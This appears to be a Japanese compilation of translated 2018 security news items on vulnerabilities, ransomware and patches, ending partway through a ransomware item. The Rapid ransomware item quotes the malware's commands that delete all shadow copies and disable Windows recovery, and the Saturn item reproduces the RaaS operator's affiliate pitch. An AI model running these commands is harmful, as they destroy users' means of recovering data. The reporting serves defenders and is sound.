     "Invitation.msrcincident"は、様々な設定データを含むXMLファイルである。Ahmedは、Microsoftが、このファイルをサニタイズ(【訳註】 テキストデータ上の「&」や「>」など特殊文字を一般的な文字列に変換する処理のこと(IT用語辞典より))することに失敗しており、Invitation Fileに著名なXML External Entity(XEE)悪用攻撃を埋め込むことが可能であることを発見した
     犠牲者がブービートラップされたInvitation.msrcincidentを開くと、犠牲者のWindowsリモートアシスタンス・ツールは、ローカルファイルを取得し、それをリモートサーバにアップロードするように欺かれる。

    標的型攻撃に役立つハック

     攻撃者は、標的のPC上に存在することが知られている機密情報(ログ、バックアップ、データベースファイル、INI、その他パスワードや他の設定オプションを含む設定ファイル)を含むファイルを獲得するために、この脆弱性を利用することができる。
     上述したように、この種の脆弱性は、大量悪用攻撃することはできないし、最初に、犠牲者に技術サポートを提供することに同意してもらう必要がある。それ故、CVE-2018-0878は、技術アシスタントを提供してもらおうとする特定の知名度の高い個人に対する標的型攻撃の極一部に関してのみ理想的である。
     Microsoftは、Windows 7以降の全てのバージョン用のパッチを出荷した。最先端のWindows 10に関しては、Microsoftは、時代遅れのリモートアシスタンスを新しいクイックアシスト(Quick Assist)に置き換えている。Quick Assistは、Invitation Fileの代わりにInvite Codeを使用しているので、この種の攻撃に対する脆弱性は存在していない。


    身代金を支払った人々の半分しかデータは復元されていない
    BleepingComputer : News>Security (2018/03/09)

     約1200人のITセキュリティ実行者と17ヵ国の意思決定者による大規模な調査は、昨年身代金要求型マルウェアに感染し、身代金を支払った犠牲者の半分しかファイルを復元できなかったことを明らかにした。
     研究者とマーケティング企業CyberEdgeグループによって実行されたこの調査は、例え深刻な理由からであろうとも、身代金を支払っても、犠牲者がファイルへの再アクセスを保証されていないことを明らかにしている。
     時宜にかなったバックアップは、簡単に復元が可能なので、依然として身代金要求型マルウェアに対する最も効果的な防御策である。

    全犠牲者の1/4を越える人々が永遠にデータを失っている

     この調査は、全回答者の55%が2017年中に身代金要求型マルウェアに感染していることを明らかにしている(前年の研究結果と比較すると、類似の感染者は61%)。
     身代金要求型マルウェアに感染した犠牲者の内、CyberEdgeは61.3%の人が最終的に身代金を支払っておらず、そのうちの8%の人々は永遠にデータを失っている。残りの53.3%の人々は、バックアップや身代金要求型マルウェア復元アプリケーションを使用して、何とかファイルを復元している。
     身代金の支払いを選択した38.7%の人々の内、半分未満(19.1%)の人々が、その身代金要求型マルウェアの作者によって提供されるツールを使用してファイルを復元している。
     残りの19.6%の人々はデータを失っている。これは、身代金要求型マルウェアの作者が、復号指示やアプリケーションを提供していないのか、それらのツールが期待されている結果をもたらさなかったかの何れかである。
     全体的に、この研究は、身代金を支払おうが支払うまいが、身代金要求型マルウェアの犠牲者の1/4を超える人々(27.6%)が、彼らのデータを永遠に失っていることを発見している。
     CyberEdgeの調査の他の発見は以下である。

      ・ 全組織の77%が、2017年にサイバー攻撃で傷つけられている(2016年は79%以下)。
      ・ セキュリティ関連予算は昨年に比べ4.7%増えると予測されている。
      ・ セキュリティ関連予算は、2018年では、企業のIT予算全体の12%を占めると予想されている。
      ・ 4/5の組織が、ITセキュリティ技術を持つ人材の不足を経験していると発言している。
      ・ 9/10の企業がクラウドセキュリティと個人情報問題を経験している。
      ・ 調査回答者は、セキュリティに関する組織の最弱点のリンクは、モバイルデバイスとアプリケーション・コンテナ(Docker, Kubernetes, Cloud Foundry)であることに気が付いていると発言している。
      ・ 回答者は、2018では、彼らが高度なマルウェア解析/サンドボックス化(ネットワーク・セキュリティ)、コンテナ化/マイクロ仮想化(エンドポイントとモバイルセキュリティ)、そして、APIゲートウェイ(アプリケーションとdata-centric security(【訳註】 ネットワーク・セキュリティよりむしろ、データそれ自体のセキュリティを強調するセキュリティアプローチ))に金銭を投資することを計画していると発言している。


    InternetのEmailサーバーの半分に影響を与える脆弱性
    BleepingComputer : News>Security (2018/03/06)
     この緊急の脆弱性は、数十万のEmailサーバーに影響を与える。修正はリリースされているが、このフローは、半分を超えるインターネットのEmailサーバーに影響を与える。そして、この問題にパッチすることは、数カ月はかからないにしても数週間はかかるだろう。
     このバグは、Emailサーバー上で実行され、送信者から受信者へEmailを中継するEximソフトウェア(メール転送エージェント(MTA))中の脆弱性である。
     2017年3月に行われた調査によると、インターネットEmailサーバー全体の56%(その時点で56万を超える)がEximを実行していた。より最近の別のレポートは数百万に上るとしている。

    このバグはリモートコード実行を可能にする

     Meh Changと名乗る台湾のセキュリティ研究者が、このバグを発見した、そして、彼は2月2日に、この問題をEximのクルーに報告した。Eximチームは、このRCE(【訳註】 リモートコード実行)問題を修正するEximディストリビューション 4.90.1を2月10日にリリースした。
     このバグ(CVE-2018-6789)は、"pre-auth remote code execution"(認証前リモートコード実行)として分類される。これは、攻撃者がサーバーに認証される前に、Exim Emailサーバーを欺き、悪意あるコマンドを実行できることを意味している。
     実際のバグは、EximのBase64デコード関数中の1-バイト バッファオーバーフローであり、今迄にリリースされたEximの全てのバージョンに影響を与える。
     Changは、本日早朝にリリースされたブログへの投稿で、このバグを説明(EximのSMTPデーモンを悪用するための基本ステップを詳らかにするために)した。

    Proof of Concept(概念の実証)や悪用コードは存在していない

     セキュリティ・アドバイザリにおいて、Eximチームは公にこの問題を認めた。「現在、我々は重大性に関しては不確かである。我々は、悪用は困難であると確信している。緩和策は知られていない」と、Eximチームは発言している。
     Exim 4.90.1 がリリースされたので、アップデートされたEximバージョンは、第一にデータセンター中で使用されているLinuxディストリビューションにジワジワ伝わっていく。しかし、問題は、オンライン上に残っている未パッチのシステムの数にある。Eximが最も人気のあるメール・エージェントであることを考慮すると、CVE-2018-6789は、大きな攻撃領域を開いているので、Eximサーバーの所有者は、可能な限り早急に、Exim 4.90.1の配備を検討すべきである。
     記述している時点で、脆弱性のあるEximサーバーを悪用するための公開されている攻撃コードは存在していない。しかし、これは、Changのブログへの投稿に従うなら、多分これは、今後変わるだろう。
     Changはまた、昨年二つの他のEximバグを発見している。これもまた、リモートコード実行を導く。これらのバグは、Exim 4.90でパッチされている。


    新しいSaturn RaaSは、無料であらゆる人を身代金要求型マルウェアの配布者にする
    BleepingComputer : News>Security (2018/02/18)
     新しく発見されたSaturn身代金要求型マルウェアの作者は、新しく起動したRansomware-as-a-Service (RaaS、サービスとしてのランサムウェア)を介して無料であらゆる人を身代金要求型マルウェアの配布者にしている。
     新しいRaaSポータルの全体構想は、新しいSaturn身代金要求型マルウェアの兵器化されたバージョンへの簡単アクセスを可能にすることである。
     身代金要求型マルウェアの配布者になりたい者が実行しなければならないことは、Saturn身代金要求型マルウェアのコピーを得るためにダークウェブ(【訳註】 匿名性が前提され、一般的なインターネット閲覧手法では閲覧できずアクセスする手がかりもない環境にあり、多くは非合法のやりとりのために用いられるウェブ上のコンテンツの総称(Weblioより))上にホストされているこの新しいポータルにサインアップし、それを広めることである。
     過去にBleeping Computerが解析した他のRaaSポータルは、身代金要求型マルウェアのバイナリの兵器化されたバージョンにアクセスする前に、通常ユーザに前払い金を要求する。このSaturn RaaSは、最初から前払金無しで、この兵器化された身代金要求型マルウェアのバイナリを、誰もが手にできる全く新しいRaaSビジネスモデル アプローチを取っている。

    系列は身代金の70%を得る

     そのようなファイルの一つ(Saturn RaaSインターフェースにおいてはスタブと呼ばれる)を生成するユーザは、次に、EXE、Office, PDF, 他のドキュメントのような他のファイルに、それを埋め込まなければならない。これらのファイルは、次に、最も一般的な二つの身代金要求型マルウェア拡散方法であるスパムメールや悪意ある広告キャンペーンの一部としてユーザに送信される。
     感染させられた犠牲者は、su34pwhpcafeiztt.onionに配置されたSaturn支払いポータルで復号料金を支払わなければならない。この金はSaturn身代金要求型マルウェアの作者のメインBitcoinアカウントに入る。
     犠牲者に感染したファイルがRaaSポータルで生成されたのであれば、Saturnの作者が30%を確保し、ファイルを生成し、それを犠牲者に拡散したユーザは、全支払金額の70%を受け取る。

     サインアップした後、あなたのアカウントにログインし、新しいウィルスを作成し、それをダウンロードする。これで、あなたは、作成したこのウィルスで人々への感染を開始する準備ができた。ここで、重要なことは、70%のBitcoinが、あなたの口座に入る。例えば、あなたが身代金を $300 とした場合、あなたは $210 を得、我々は $90 を得る。

     Saturnの7:3の分け前は、Cerber RaaS(今日、最大の身代金要求型マルウェア オペレーションの一つ)の分け前と同じようなものである。
     Saturn RaaSは、現在、登録受付中であり、既にダークウェブのURLスキャナとディレクトリに現れている。あなたのレポーターは、Saturn RaaSのアカウントにサインアップした。以下が、そのポータルの現在のGUIと機能のスクリーンショットである。


    Saturn RaaSダッシュボード(画像をクリックすると拡大します)


    Saturn RaaSチャット(画像をクリックすると拡大します)


    Saturn RaaSスタブ ビルダー(画像をクリックすると拡大します)


    Saturn RaaS払い戻し(画像をクリックすると拡大します)

     Bleeping Computerは、先週の金曜日、我々の読者が、ここで閲覧できる記事で、Saturn身代金要求型マルウェアを解析した。この身代金要求型マルウェアは、積極的な拡散活動中である。
     サンプルのスタブファイル用のハッシュが、Saturn RaaSから取得された。

    b3040fe60ac44083ef54e0c5414135dcec3d8282f7e1662e03d24cc18e258a9c

    GandCrabもまた、RaaSを介して提供されていた

     激しい配布活動が見られるもう一つの身代金要求型マルウェアは、GandCrab身代金要求型マルウェアである。この株もまた、RaaSに似た悪巧みで提供されている。
     ペルー人のセキュリティ研究者David Montenegroは、GandCrabが、ロシア語ユーザ用の悪名高いサイバー犯罪フォーラムで売り歩かれていることを発見した(David Montenegroのブログはこちら)。


    Googleが、Microsoft Edgeのセキュリティ機能のバイパスを公開
    BleepingComputer : News>Security (2018/02/17)

     Googleは、攻撃者がMicrosoft Edgeブラウザのセキュリティ機能の一つ(Arbitrary Code Guard(ACG))を悪用し、バイパスすることのできるEdgeの脆弱性に関する詳細を公開した。
     ACGは、Edgeセキュリティモデルに追加された比較的新しい機能である。Microsoftは、Windows 10 Creators Updateのリリースに伴い、2017年04月にEdgeにACGサポートを追加した。
     ACGは、攻撃者がEdgeを介してコンピュータのメモリに悪意あるコードをロードするためにJavaScriptを使用することから妨げるだろうと、Microsoftが発言した二つの新しい機能の二番目のものである。Microsoftは、昨年のブログで、この二つのセキュリティ機能を説明している。ACGとCode Integrity Guard(CIG)の概要は以下である。

     アプリケーションは次のどちらかによってメモリに悪意あるネイティブ コードを直接読み込むことができます。
    1) 悪意のあるDLL / EXEをディスクからロードするか、
    2) メモリ内のコードを動的に生成/変更します。
    CIGは、Microsoft EdgeのDLLコード署名要件を有効にすることで、最初の方法を防止します。これにより、適切に署名された DLL のみがプロセスによってロードされるようになります。ACGは、署名されたコードページが不変であり、新しい符号なしコードページを作成できないことを保証することによってこれを補完します。
    (【訳註】 和訳は、Microsoft Edge Japanより引用)

    GoogleのエンジニアはACGをバイパスする方法を発見した

     GoogleのProject Zeroチームのセキュリティ エンジニアIvan Fratricは、ACGをバイパスし、攻撃者がメモリ中に未署名のコードをロードすることを可能にする方法を発見した。これは、攻撃者がEdgeにロードされた悪意あるWebサイトを介してWindowsに入り込むことを可能にするものである。
     Fratricは、昨年11月、個人的なバグレポートでMicrosoftにこの問題を通知していたが、バグ修正の期限を過ぎた。
     「この修正は、当初見込まれていたより複雑である、そして、メモリ管理問題に起因するために、我々は、おそらく2月のリリース期限を守ることはできないだろう...」と、MicrosoftはFratricに告げている。
     「(Microsoft Edge)チームは、この修正を3月13日にリリースするために準備している」と、Microsoftは追加している。

    Fratricが発見した二回目のEdgeのバグ

     この問題に関する詳細が今や公開された。これは、FratricがEdgeのバグを公開した最初の事例ではない(昨年2月にも、公開している)。
     Fratricは、Domato(ブラウザエンジン中のセキュリティ上の欠陥を発見するためのファジング・ツール(【訳註】 ソフトウェアの不具合(とくに脆弱性を意図することが多い)を発見するためのテスト・ツール(Wikipediaより))の作者でもある。


    Lenovoは、多くのThinkpadモデルに影響を与える緊急のWiFi脆弱性を警告
    Kaspersky : ThreatPost (2018/02/09)
     Lenovoは、金曜日に、人気のあるThinkPadブランドの25のモデルに影響を与える二つの緊急のBrpadcom脆弱性を顧客に警告した。この脆弱性は、最初、9月に明らかにされ、当初それらは、Apple iPhones, Apple TV, Androidデバイス中に使用されている特定のチップセットに影響を与えるだけだと報道されていた。
     Lenovoは、Windows 10用のBroadcomのBCM4356 Wireless LANドライバを使用している凡そ2ダースのThinkPadを含むようにこのリストを拡大した。Lenovoアドバイザリによると、このWiFiチップセットは、AppleとGoogleによって9月にパッチされた同じファームウェアの脆弱性(CVE-2017-11120CVE-2017-11121)を含んでいる。
     二つの脆弱性は、バッファオーバーフローを含むBroadcomのワイアレスLANドライバによって使用されているコントローラに結び付けられている。これは、このアダプタ上で任意のコード実行を獲得できた攻撃者が悪用することができるものであるが、システムのCPUをターゲットにしているものではない。二つのCVEは、「緊急」と評価されており、MitreのCVSSスケールでは、スコア10である。
     脆弱性CVE-2017-11120は、6月にGoogle Project Zeroの研究者Gal Beniaminiによって最初に同定され、9月に「概念の実証」バグレポートとして公に公開された。
     「この脆弱性攻撃が成功すると、バックドアが、このファームウェアに挿入され、巧みに細工されたアクション フレーム(これらは、WiFiチップをリモートから簡単に制御することを可能にする)を介して、このファームウェアにリモートからの読込みや書き込みコマンドを発生させることが可能になる」とBeniaminiは発言している。
     この脆弱性は、iPhoneと他の製品(Apple TVで使用されているtvOSと、Apple Watchで使用されているwatchOSを含む)でAppleによって使用されているBroadcomチップ中に存在している。Androidもまた、同じチップを使用している。Googleは、9月にAndroid Security Bulletinでこのバグをパッチしている。
     脆弱性CVE-2017-11121もまた、Beniaminiによって発見された。これは、WiFiシグナルの不適切な検証によって発生させられるバッファオーバーフロー脆弱性である。研究者によると「適切に細工された悪意ある無線Fast Transitionフレームは、潜在的に内部WiFiファームウェアのヒープやスタックオーバーフローを引き起こし、DoSやその他の影響を引き起こす可能性がある。」
     この脆弱性はまた、GoogleのAndroid OSと連動してApple iOSやtvOSにも影響を与える。
     Lenovoは、影響を受けるThinkPadの顧客に、彼らのWiFiドライババージョンをアップデートするように推奨している。影響を受けるThinkPadの商品識別番号は、ThinkPad L460, ThinkPad P50s, ThinkPad T460, ThinkPad T460p, ThinkPad T460s, ThinkPad T560, ThinkPad X260, ThinkPad Yoga 260である。


    WordPressユーザへ: 今アップデートを手動で実行しなさい
    Sophos : NakedSecurity (2018/02/08)
     WordPressが大変厄介なバグをアナウンスした。
     今週初め、この世界で最も広汎に使用されているブログとコンテンツ配信プラットフォームは、バージョン4.9.3 Maintenance Releaseを送り出した。
     このパッチには、緊急のセキュリティパッチは存在していないが、34のバグフィックスが存在していた。そして、誰かが、即座にバグフィックスすることを望んでいただろうか?
     4年以上に渡り、WordPressをアップデートすることは、大変簡単であった。あなたは、一つの単語もタイプする必要なく、ただボタンを押すだけだった。
     WordPress 3.7が出現した2013年10月に遡り、Naked SecurityのMark Stockleyの記述がある。

     我々は、デスクトップ、タブレット、ラップトップ、スマートフォンで、バックグラウンドでそれ自体を暗黙のうちにパッチするこのソフトウェアの考えに完全に慣れた。そして、だいぶ遅れたとはいえ、この人気あるWebソフトウェアが追いつくのを見ることは良いことである。
     WordPressがこのような重要なステップをバックグラウンドでアップデートすることは、このソフトウェアにとって一番受けが良いことである。世界中のWebサイトで、どのくらいWordPressを稼働しているのか誰も定かにできていないが、意見の一致するところでは、凡そ15から20%とされているようである。

     今日、幾つかの見積は、WordPress Webサイトはもっと多く共有されている(20%を超える)としているので、自動アップデートは2013年当時よりずっと重要になっている。

    22のバグの落とし穴

     残念ながら、WordPress 4.9.3は、アップデート・バグを導いた。4.9.3に自動アップデートした後、WordPressはもはや自動アップデートをしない。
     良いニュースは、既に4.9.4が出現していることである(翌日に緊急の修正として公開された)。
     しかし、悪いニュースは、あなたが、もう一度2012年の状態を装い、手動でアップデートする必要があるということである。
     あなたが、4.9.4を取得したら、自動アップデートは修復されるだろう。4.9.5が出現したら、それは、あなたが期待しているようにそれ自体の面倒をみるはずである。

    何をすべきか

     WordPressはバグの説明と「手動」でのアップデートに関する詳細な説明を公開している。長過ぎて、全部読まなかったが、

     あなたのWordPress Dashboard > Update を単純に訪問し、"Update Now"をクリックする。

     遅れるな。この操作を今日実行しなさい。そうすることで、これを忘れてしまい、将来窮地に陥るリスクが失くなる。
     他の人があなたのためにWordPressサーバーをホストしているのであれば、その人が、あなたに既に通知している場合を除き、今週の二つのアップデートを完了したか否かを確認しなさい。


    研究者が身代金要求型マルウェアを防御するWindowsのControlled Folder Accessをバイパスする方法を発見した
    BleepingComputer : News>Security (2018/02/06)
     セキュリティ研究者は、2017年10月に追加されたWindows 10中の"Controlled Folder Access"機能をバイパスする方法を発見していた。これはMicrosoftが信頼あるアンチ-身代金要求型マルウェア防御機能として大げさに宣伝していたものである。
     Bleeping Computerのレビューで詳細に説明されているこの機能は、Windows 10の全てのバージョンに組み込まれているWindows Defenderアンチウィルスの一部である。
     Windows 10 Fall Creators Updateにアップデートしたユーザは、Controlled Folder Access (CFA)と名付けられたWindows Defender用のアップデートを受け取っている。これは、ユーザが指定したディレクトリ中に見出されるファイルに対するあらゆる改竄をブロックすることをユーザに可能にするものである。
     ユーザは、CFAフォルダ中に配置されたファイルの編集を許可した全てのアプリケーションを、各アプリケーションの実行ファイルを手動で、"Allow an app through Controlled folder access"(フォルダー アクセスの制御を通じてアプリを許可する)オプションを介して管理されているホワイトリストに追加することによって承認しなければならない。


    Controlled Folder Access(アプリケーション ホワイトリスト)

    しかし、SecurityByDefaultのスペインのセキュリティ研究者Yago Jesusは、Microsoftが、このリストに全てのOfficeアプリケーションを自動的にホワイトリストしていたことを発見した。これは、ユーザが好むと好まざるとに拘わらず、OfficeアプリケーションがCFAフォルダ中に配置されているファイルを改竄できることを意味している。

    身代金要求型マルウェアはCFAをバイパスするためにOffice OLEオブジェクトを使用することができる

     身代金要求型マルウェア開発者は、Officeファイルの内部にOLEオブジェクトを介してCFAをバイパスする簡単なスクリプトを追加することでMicrosoftのCFAアンチ身代金要求型マルウェア機能を簡単にバイパスすることができると、Jesusは発言している。
     週末に公開された研究において、Jesusは、CFAフォルダの内部に格納された他のOfficeドキュメントのコンテンツを上書きし、この同じファイルをパスワードで保護したり、あるいは、CFAフォルダの外にあるファイル内部のコンテンツをコピー&ペーストし、それらを暗号化し、そのオリジナルを削除するために、ブービートラップされたOfficeドキュメント(スパムメールを介して受信される)を悪用した三つの例を挙げた。
     最初の例は単に破壊的なものだが、後の二つは実際の脅迫として機能し、被害者は、この身代金要求型マルウェアの作者に身代金を支払い、ファイルのロックを解除するパスワード(復号コード)を入手しなければならない。

    JesusはMicrosoftに嫌気がさした

     Jesusは、彼が発見した問題をMicrosoftに通知したと発言している。彼がMicrosoftから受け取ったeMailのスクリーンショットにおいて、Microsoftは、この問題をセキュリティ上の脆弱性と分類しておらず、報告されたバイパス方法を解決するために、今後のリリースでCFAを改善するだろうと発言したとしている。
     彼が指摘した問題についてクレジットやバグ・バウンティの報酬を得ることはないと言及しつつ、「これは、Microsoftが認識なしでの緩和策のバイパスとして認識したこの脆弱性を修正することを本当に意味している」と、Jesusは発言している。


    Microsoftからのメールのスクリーンショット


    AdobeがFlashの0-Dayを警告している。パッチのリリースは来週
    Sophos : NakedSecurity (2018/02/02)
     1998年の再来のようである!
     多分、2008年の再来と言ったほうが正しいだろう。
     ...Adobe Flash中に0-Dayのセキュリティホールがある。
     Adobeの今年最初のFlash Security Advisory(APSA18-01(【訳註】 APSA18-01に関するIPA情報処理推進機構のサイトはこちら))で、Adobeは以下のように警告している。

     Adobeは、CVE-2018-4878に関する脆弱性攻撃がオンライン上に存在しており、それが、Windowsユーザに対する標的型攻撃として限定的に使用されているとするレポートに気が付いている。これらの攻撃は、eMailで配布された悪意あるFlashコンテンツが埋め込まれたOfficeドキュメントを悪用している。

     ここで専門用語を再考する:

      ・ CVE-2018-4878は、Flash中のセキュリティ バグや脆弱性を同定する代用語である。
      ・ 脆弱性攻撃という言葉は、この脆弱性を引き金にし動作しているブービートラップされたファイルが存在していることを意味している。
      ・ 悪意あるFlash脆弱性攻撃ファイルのキャリアとしてのOfficeドキュメントの使用と、外部からユーザにマルウェアを押し付けるためにeMailを使用していることは、これがリモート攻撃であることを意味している。
      ・ あなたのコンピュータを欺くために、警告なしに外部から送信されるプログラムコードを実行する脆弱性攻撃は、RCE(Remote Code Executionの頭文字)と呼ばれ、最も危険な種類の脆弱性攻撃である。
      ・ RCEは、犯罪者が発見し、パッチが準備される前に、それを最初に使用することから0-Dayと呼ばれる。即ち、あなたが積極的にパッチを適用するまで0-Dayが存在している。

     良いニュースは、Adobeが、再来週の定例のパッチの火曜日(2018/02/13)まで待つのではなく、来週(2月5日から始まる週)パッチをリリースしようとしていることである。
     悪いニュースは、勿論、来週まで利用できないことであり、それまで、この脆弱性は0-Dayのまま残ることになる。

    何をすべきか?

      ・ あなたがFlashを必要としていないのであれば、Flashをアンインストールしなさい。我々がFlashに関して聞く最も一般的な「必要性」は、Webビデオを見ることであるが、殆どすべてのWebサイトは、あなたがFlashを持っていない場合に備えてビデオ用にHTML5を使用している。あなたがFlashをアンインストールしても、あなたのブラウザは、代わりに、組み込みのビデオプレーヤーを使用するので、おそらく、あなたは全くFlashを必要としないはずである。
      ・ あなたがFlashを必要であると確信している場合を除いて、とにかくFlashをアンインストールしてみなさい。重大な何かが機能停止した場合には、あなたはFlashを常に戻すことができる。
      ・ できる限り早急にAdobeのアップデートを入手しインストールしなさい。あなたが予防措置としてFlashをアンインストールした場合は、新しいバージョンが出現するまでFlashを再インストールしないようにしなさい。

     あなたのブラウザのFlashをOFFにするだけでは十分ではないことに注意しなさい。これはWebページに埋め込まれたFlashファイルをブラウザ中でレンダリングすることを妨げるが、あなたのコンピュータから完全にFlash Playerを削除しているわけではない。
     我々は、犯罪者が、あなたのブラウザをバイパスするためにOfficeドキュメント内部にブービートラップされたFlashファイルを埋め込んでいると仮定している。そして、ここは、多くのユーザがFlashの再生を既にブロックしているか、特定のWebサイトでだけFlashをアクティベートしている場所である。


    LenovoのThinkPad Manager中のメジャー セキュリティフローは、ハッカーがあなたのラップトップにアクセスすることを可能にする
    Bitdefender : Hot For Security (2018/01/31)
     LenovoのThinkPad Manager Proソフトウェア中の緊急の暗号化脆弱性は、Windows 7, 8, 8.1を稼働しているラップトップの指紋認証をバイパスすることで、ハッカーがユーザのコンピュータにアクセス可能であることを明らかにした。Lenovoは先週、セキュリティアドバイザリで、これを確認している。
     「この脆弱性は、Lenovo Fingerprint Manager Pro中に特定された。Lenovo Fingerprint Manager Proによって格納された極秘データ(ユーザのWindowsログオン認証と指紋データ)は、ハードコードされたパスワードを含む弱いアルゴリズムを使用して暗号化されており、ローカルの非管理者アクセス権限の全てのユーザが、これがインストールされているシステムにアクセス可能になっていた」と、このステートメントは読める。
     Windows 10を実行しているデバイスは、Microsoftの指紋リーダーを使用しているので影響を受けない。
     この脆弱性を悪用するには、ハッカーは、ローカルアクセスが要求された時、直接自分でそれを実行しなければならない。
     Fingerprint Manager Proアプリケーションのパッチは1月25日にリリースされている。脆弱性のあるモデルを使用しているユーザは、バージョン 8.01.87 をダウンロードしインストールするよう促されている。

     脆弱性のあるモデルは以下である。

      ThinkPad L560
      ThinkPad P40 Yoga, P50s
      ThinkPad T440, T440p, T440s, T450, T450s, T460, T540p, T550, T560
      ThinkPad W540, W541, W550s
      ThinkPad X1 Carbon (Type 20A7, 20A8), X1 Carbon (Type 20BS, 20BT)
      ThinkPad X240, X240s, X250, X260
      ThinkPad Yoga 14 (20FY), Yoga 460
      ThinkCentre M73, M73z, M78, M79, M83, M93, M93p, M93z
      ThinkStation E32, P300, P500, P700, P900


    Microsoftは、Spectre Mitigationsを無効化するWindowsの定例外のアップデートをリリースした
    BleepingComputer : News>Security (2018/01/28)
     Microsoftは、Spectre Variant 2 のバグ(CVE-2017-5715)のパッチを無効化する緊急の定例外アップデートを土曜日にリリースした。
     このアップデート(KB4078130)は、Windows 7 (SP1), Windows 8.1, Windows 10の全バージョンとサポートされる全てのWindows Serverディストリビューションをターゲットにしている。
     Microsoftは、今年1月3日にMeltdownとSpectre用の緩和策を出荷していた。

    MicrosoftはIntelステートメントに反応した

     Microsoftは、Intelがこのバグのために開発されたマイクロコード アップデートが「予期した以上の再起動と、データ損失と損壊を導く他の想定外のシステム挙動」を発生させると公に認めた後、Spectre Variant 2 のバグ用の緩和策を無効化することに決定したと発言している。
     対応として、Microsoftは、Intelがより安定した修正を開発するまでSpectre Variant 2 の緩和策を無効化することに決定した。
     直ぐに、これらのアップデートが影響を受けたコンピュータに展開できない場合は、Microsoftはまた、レジストリキーを介してSpectre Variant 2 の緩和策を手動で無効にする方法の説明を提供している。個別の手順はWindowsデスクトップサーバーユーザに関して利用可能である。

    Microsofだけがこのバグの問題を持っているわけではない

     MicrosoftはSpectre Variantの二つのパッチを取り消した最初の企業ではない。Intelのアナウンスの後、Dellは、Spectreパッチを含んでいない「以前のBIOSバージョンに戻す」ように顧客にアドバイスしている。
     HP(ヒューレットパッカード)はまた、類似のステップを取っている。HPは、MeltdownとSpectre(Variant 1とVariant 2)のパッチを含むBIOSアップデートを利用可能にしていたが、今週MeltdownとSpectre Variant 1のパッチだけを含みVariant 2 は含まないBIOSアップデートを再発行した。
     Red Hat Enterprisesはまた、Intelの公式アナウンスの前であるにも拘わらず、先週Spectre Variant 2 のパッチ取り消すことを決定した。
     IntelはSpectre Variant 2 のパッチで問題を発生した唯一のメジャーCPUメーカーではない。このバグはまた、AMDプロセッサを搭載したデバイスでも問題を発生するので、Microsoftは、AMDプロセッサ用のWindowsアップデートの公開を休止している。Microsoftは、報告されているBSODエラーを修正するためにAMDと共同作業した後に、これらのアップデートを再開している。


    Acronis: 身代金要求型マルウェア プロテクション。さあ、無料の身代金要求型マルウェア防御を手に入れよう
    The Register : Security (2018/01/26)
     Acronisは、AIベースのActive Protectionテクノロジを搭載したフリーでスタンドアロン バージョンのAcronis Ransomware Protectionをリリースした。
     これは、Windowsシステム上で既存のバックアップ製品やアンチウィルス製品と並行して使用することができる。
     この軽量なソフトウェア(20MB)はバックグラウンドで動作し、リアルタイムでシステムプロセスを監視し、あらゆる身代金要求型マルウェア攻撃を自動的に検出し停止させると言われている。身代金要求型マルウェアが検出されると、このソフトウェアは悪意あるプロセスをブロックし、ポップアップでユーザに通知する。このソフトは、身代金要求型マルウェアの影響を受けたファイルの即時復元を手助けする。
     Acronisは、機械学習モデル(AcronisのCloud AIインフラストラクチャ中で数十万の悪意あるプロセスと正当なプロセスを解析することによって生み出された)によって拡張された挙動ヒューリスティックを使用していると発言している。
     このモデルは、このフリーの製品に直接組み込まれており、実行にインターネット接続を必要としない。シグネチャ ベースの製品では検出できない0-Dayの攻撃を含め、全ての身代金要求型マルウェアの株を打ち負かすのに効果的であると、我々は告げられている。
     このソフトウェアはクラウドバックアップ機能を搭載しており、全てのユーザが、無料で5GBのAcronis Cloudストレージを受け取ることができる。
     あなたは、このソフトウェアをテストするためにRanSimの身代金要求型マルウェア シミュレータを使用することができる。この件に関するAcronisのブログはこちら

    追加のコメント

     これは、Acronisによる気の利いたマーケティング戦略である。何らかの役に立つのであれば、無償のアンチ身代金要求型マルウェア ツールを好まないものがいるだろうか? 詳細に関してはこちらを参照しなさい。
     残念ながら、Windows 7 SP1, 8, 8.1, 10 でのみ利用可能である。
     このソフトウェアのダウンロードはこちら。登録は要求されない。


    Rapid身代金要求型マルウェアはユーザが作成した新しいファイルを暗号化し続けている
    BleepingComputer : News>Security (2018/01/23)
     最初にコンピュータを暗号化した後、アクティブなまま存在し、作成されたあらゆる新しいファイルを暗号化するRapidと呼ばれる新しい身代金要求型マルウェアが拡散中である。この挙動はRapid特有のものではないが、我々が頻繁に見る一般的な挙動ではない。
    Rapid身代金要求型マルウェアが拡散している方法は未知であるが、一月に始まり、多くの人々に感染し続けている。ID-Ransomwareの統計によると、統計上の最初発見は1月3日であり、これまでに300を超える登録になっている。この数は、多分全犠牲者の中の氷山の一角であり、十中八九この感染を特定するためのID-Ransomwareを活用していない多くの人々がいる。

    ID-RansomwareへのRapid身代金要求型マルウェア提出数

    Rapid身代金要求型マルウェアがコンピュータを暗号化する方法

     この身代金要求型マルウェアが実行されると、この身代金要求型マルウェアは、シャドーボリュームコピーを除去し、データベース プロセスを終了し、自動修復を無効化する。この終了させられるプロセスは、sql.exe, sqlite.exe, oracle.comであり、実行されるコマンドは以下である。

    vssadmin.exe Delete Shadow /All /Quiet
    cmd.exe /C bcdedit /set {default} recoveryenabled No
    cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures

     これらのコマンドが実行されたら、この身代金要求型マルウェアは、暗号化するためのファイルに関してコンピュータをスキャンする。ファイルが暗号化されると、その暗号化されたファイル名に .rapid 拡張子を追加する。

    暗号化されたフォルダ

     この身代金要求型マルウェアがコンピュータの暗号化を終了すると、Windowsデスクトップを含む様々なフォルダ中にHow Recovery Files.txtと名付けられた脅迫文を作成する。この脅迫文は、犠牲者が支払い指示を受け取るためにコンタクトしなければならないeMailを含んでいる。

    Rapid身代金要求型マルウェアの脅迫文

     この感染はまた、この身代金要求型マルウェアがスタートアップで起動するautorunsを作成し、脅迫文を表示する。これらautorunsに関する情報は以下のIOCsで発見することができる。
     現時点で、Rapid身代金要求型マルウェアは、無料で復号することはできないし、支払ったとしても攻撃者が復号キーを提供してくれるかどうか分かっていない。感染させられた人々に関して、我々は、犠牲者がこの感染を論議しサポートを受けることのできるRapid Ransomware Support & Helpトピックを立ち上げている。

    Rapid身代金要求型マルウェアに感染した場合に、あなたが実行すること

